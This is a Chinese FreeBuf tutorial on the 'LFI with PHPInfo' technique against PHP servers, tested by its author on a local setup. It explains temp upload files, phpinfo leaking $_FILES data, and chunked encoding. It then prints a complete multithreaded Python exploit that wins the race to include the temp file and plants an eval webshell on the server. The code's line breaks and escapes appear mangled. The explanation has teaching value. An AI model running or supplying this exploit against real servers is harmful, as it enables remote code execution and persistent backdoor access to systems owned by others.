LFI with PHPInfo本地测试过程

原创作者‍：Drops@ZUT ‍ ‍ ‍

LFI with PHPInfo是国外研究员在2001年公布的本地文件包含利用方法，作为新手，在国内却找不到完整的学习资料，经过几天的研究学习，把自己的学习过程进行总结，与大家共享。

基础知识

本地文件包含，英文Local File Include，简称LFI。文件包含是一种简化代码、提高代码重用率的方法。但是，由于没有正确处理用户输入，导致本地文件包含漏洞。黑客可以通过漏洞包含非PHP执行文件，如构造包含PHP代码的图片木马、临时文件、session文件、日志等来达到执行PHP代码的目的。

本地文件包含漏洞需要和精心构造的文件结合起来，才能发挥最大威力。这些精心构造的文件包括用户上传的文件、服务器产生的日志、session文件以及PHP程序创建的临时文件等等。尽管可以包含的文件有很多类型，但是也击中了本地文件包含的痛点–无法准确获取文件位置及文件名，只能通过猜测路径、文件名进行漏洞利用，这无疑增加了漏洞的利用难度。

进入LFI with PHPI

相关文件代码：

Phpinfo.php

 <?phpphpinfo();?>

Lfi.php

<?phprequire($_GET[';load';]);?>

下面介绍利用PHPInfo信息进行本地文件包含。 【你应该知道的】

一、以上传文件的方式请求任意PHP文件，服务器都会创建临时文件来保存文件内容

在HTTP协议中为了方便进行文件传输，规定了一种基于表单的HTML文件 传输方法 。

<form action="upload_file.php" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="file" id="file" />  <br /> <input type="submit" name="submit" value="Submit" /> </form>

其中PHP引擎对enctype=”multipart/form-data”这种请求的处理过程如下：

‍ 1、请求到达；

‍ 2、创建临时文件，并写入上传文件的内容；

‍ 3、调用相应PHP脚本进行处理，如校验名称、大小等；

‍ 4、删除临时文件。

PHP引擎会首先将文件内容保存到临时文件，然后进行相应的操作。

我们可以对phpinfo.php发起请求，查看服务端变化。由于处理时间极短，我们肉眼无法看到文件夹下临时文件的创建删除过程，可以选择sleep操作延长phpinfo脚本的时间，在慢镜头下，我们看到了生成的临时文件。其中临时文件内容正是我们POST请求中文件内容，临时文件的名称是php+随机数字.tmp,正中本地文件包含痛点。

通过刚才的实验，我们发现临时文件的生命周期很短，脚本执行完成后边删除临时文件。我们要做的就是在删除之前包含文件。下面继续。

二、PHPInfo可以输出$_FILES信息，包括临时文件路径、名称

在PHP中，有超全局变量$_FILES,保存上传文件的信息，包括文件名、类型、临时文件名、错误代号、大小。

Phpinfo()是一个无比强大的函数，可以输出大量的关于服务器的配置信息，其中包括超全局变量的值。

三、 分块传输编码

通常，HTTP中的响应消息都是整个发送的，在发送之前知道Content-Lenth值，作为响应头的一部分发送给客户端。

分块传输编码，可以在不知道Content-Lenth情况下，进行分块传输，并把Content-Lenth置为chunked。PHP默认情况，当传输数据大于4KB时，采用分块传输编码。将数据分为一块或多块传输。传输格式是：

每一个非空的块都以该块包含数据的字节数（字节数以十六进制表示）开始，跟随一个CRLF （回车及换行），然后是数据本身，最后块CRLF结束。在一些实现中，块大小和CRLF之间填充有白空格（0x20）。

最后一块是单行，由块大小（0），一些可选的填充白空格，以及CRLF。

四、争取时间，在临时文件删除之前执行包含操作

利用PHPInfo进行本地文件包含的主要思想是在临时文件删除前执行操作。

我们需要争取时间，时间差大致来自三个方面：

1、通过分块传输编码，提前获知临时文件名称；

分块传输可以实现在未完全传输完成时即可获知临时文件名，可以尽早发起文件包含请求，赶在删除之前执行代码。

2、通过增加临时文件名后数据长度来延长时间；

通过观察PHPinfo的信息，在$_FILES信息下面，还有请求头的相关信息，我们可以在请求的时候，通过填充大量无用数据，来增加后面数据的长度，从而增加脚本的处理时间，为包含文件争取更多的时间。

3、通过大量请求来延迟PHP脚本的执行速度。

通过大量的并发请求，提高成功的概率。由于对PHP处理性能的不熟悉，做了一个简单的测试，记录大量多个请求下，每个脚本的运行时间，结果如下：

通过上面数据，我们可以看到脚本的运行时间有波动，当然其中应该有脚本的等待执行时间，也有很大可能降低了PHP脚本的运行能力，从而延长了时间。

Python代码:

# -*- coding: utf-8 -*-import sysimport socketimport threadingdef setup(host, port):  ';';';  初始化HTTP请求数据包  TAG：校验包含是否成功标志  PAYLOAD：包含要执行的PHP代码  padding：增加数据块内容  LFIREQ:文件包含请求  REQ_DATA：POST请求数据  REQ：完整POST请求  ';';';  TAG="Security Test"  PAYLOAD="""%s <?php $c=fopen("H:/wamp/tmp/g.php",';w';); fwrite($c,"<?php eval(';fb';);?>"); ?>/r""" % TAG  padding = "A" * 2000  LFIREQ = """GET /lfi.php?load=%(file)s HTTP/1.1/r User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36/r Connection: keep-alive/r Host: %(host)s/r Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8/r Upgrade-Insecure-Requests: 1/n Accept-Encoding: gzip, deflate, sdch/n /n"""  REQ_DATA = """------WebKitFormBoundaryIYu6Un7AVVkBR0k6/r Content-Disposition: form-data; name="file"; filename="shell.php"/r Content-Type: application/octet-stream/r /r %s ------WebKitFormBoundaryIYu6Un7AVVkBR0k6/r Content-Disposition: form-data; name="submit"/r /r Submit ------WebKitFormBoundaryIYu6Un7AVVkBR0k6--/r""" % PAYLOAD  REQ = """POST /phpinfo.php HTTP/1.1/r User-Agent: """ + padding + """/r Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/r Accept-Language: """ + padding + """/r Accept-Encoding: gzip, deflate/r Cache-Control: max-age=0/r Referer: """ + padding + """/r Connection: keep-alive/r Upgrade-Insecure-Requests: 1/r Host: %(host)s/r Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYu6Un7AVVkBR0k6/r Content-Length: %(len)s/r /r %(data)s""" % {';host';: host, ';len';: len(REQ_DATA), ';data';: REQ_DATA}  return (REQ, TAG, LFIREQ)  def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):  ';';';  :param host: 目标主机IP  :param port: 端口  :param phpinforeq: 对phpinfo文件的请求  :param offset: 临时文件名位置  :param lfireq:文件包含请求  :param tag: 检测包含成功标志  :return: 返回完整临时文件名  ';';';  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect((host, port))  s2.connect((host, port))  s.send(phpinforeq)  d = ""  while len(d) < offset:   d += s.recv(offset)  try:   i = d.index("[tmp_name] =>")   fn = d[i+17:i+40]  except ValueError:   return None  s2.send(lfireq % {';file';: fn, ';host';: host})  d = s2.recv(4096)  s.close()  s2.close()  if d.find(tag) != -1:   return fn counter = 0class ThreadWorker(threading.Thread):  ';';';  线程操作  maxattempts：最大尝试次数  ';';';  def __init__(self, e, l, m, *args):   threading.Thread.__init__(self)   self.event = e   self.lock = l   self.maxattempts = m   self.args = args  def run(self):   global counter   while not self.event.is_set():    with self.lock:     if counter >= self.maxattempts:      return     counter += 1    try:     x = phpInfoLFI(*self.args)     if self.event.is_set():      break     if x:      print "/nGot it! Shell create in H:/wamp/tmp/g.php"      self.event.set()    except socket.error:     return  def getOffset(host, port, phpinforeq):  ';';';  :param host: 目标主机IP  :param port: 端口  :param phpinforeq: 对phpinfo文件的POST请求  :return:返回临时文件名在返回数据块中的位置  ';';';  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect((host, port))  s.send(phpinforeq)  d = ""  while True:   i = s.recv(4096)   d += i   if i == "":    break   if i.endswith("0/r/n/r/n"):    break  s.close()  i = d.find("[tmp_name] =>")  if i == -1:   raise ValueError("No php tmp_name in phpinfo output")  print "found %s at %i" % (d[i:i+10], i)  return i+256  def main():  print "LFI with PHPinfo()"  if len(sys.argv) < 2:   print "Usage:%s host [port] [poolsz]" % sys.argv[0]   sys.exit(1)  try:   host = socket.gethostbyname(sys.argv[1])  except socket.error, e:   print "Error with hostname %s: %s" % (sys.argv[1], e)   sys.exit(1)  port = 80  try:   port = int(sys.argv[2])  except IndexError:   pass  except ValueError, e:   print "Error with port %d: %s" % (sys.argv[2], e)   sys.exit(1)  poolsz = 10  try:   poolsz = int(sys.argv[3])  except IndexError:   pass  except ValueError, e:   print "Error with poolsz %d: %s" %(sys.argv[3], e)   sys.exit(1)  print "Getting initial offset..."  phpinforeq, tag, lfireq = setup(host, port)  offset = getOffset(host, port, phpinforeq)  sys.stdout.flush()  maxattempts = 200  e = threading.Event()  l = threading.Lock()  print "Spawning worker pool (%d)..." % poolsz  sys.stdout.flush()  tp = []  for i in range(0, poolsz):   tp.append(ThreadWorker(e, l, maxattempts, host, port, phpinforeq, offset, lfireq, tag))  for t in tp:   t.start()  try:   while not e.wait(1):    if e.is_set():     break    with l:     sys.stdout.write("/r % 4d / % 4d" % (counter, maxattempts))     sys.stdout.flush()     if counter >= maxattempts:      break   if e.is_set():    print "Woot! /m/"   else:    print ":("  except KeyboardInterrupt:   print "/nTelling threads to shutdown..."   e.set()  for t in tp:   t.join()  if __name__ == "__main__":  main() 

运行成功示例：

心得

在学习过程中，自己了解很多看不太懂的英文资料，验证每一句的真伪，查看配置文件，整个过程没有囫囵吞枣，而是细细的品味每一个细节。Pyhton使用socket发送HTTP请求。总是因为编码格式，导致Bad Request，/r/n让自己头大，但是当自己看到Got it的时候，自己几天的学习，终于有了结果。甚是欣慰！

本次测试只在本地进行测试，在测试过程中，把padding的值设为很小，也能执行成功，最大的尝试次数需要在20以上才能成功。面对不同的网络环境需要设置不同值。

* 作者/Drops@ZUT，属FreeBuf黑客与极客（FreeBuf.COM）原创奖励计划文章，未经许可禁止转载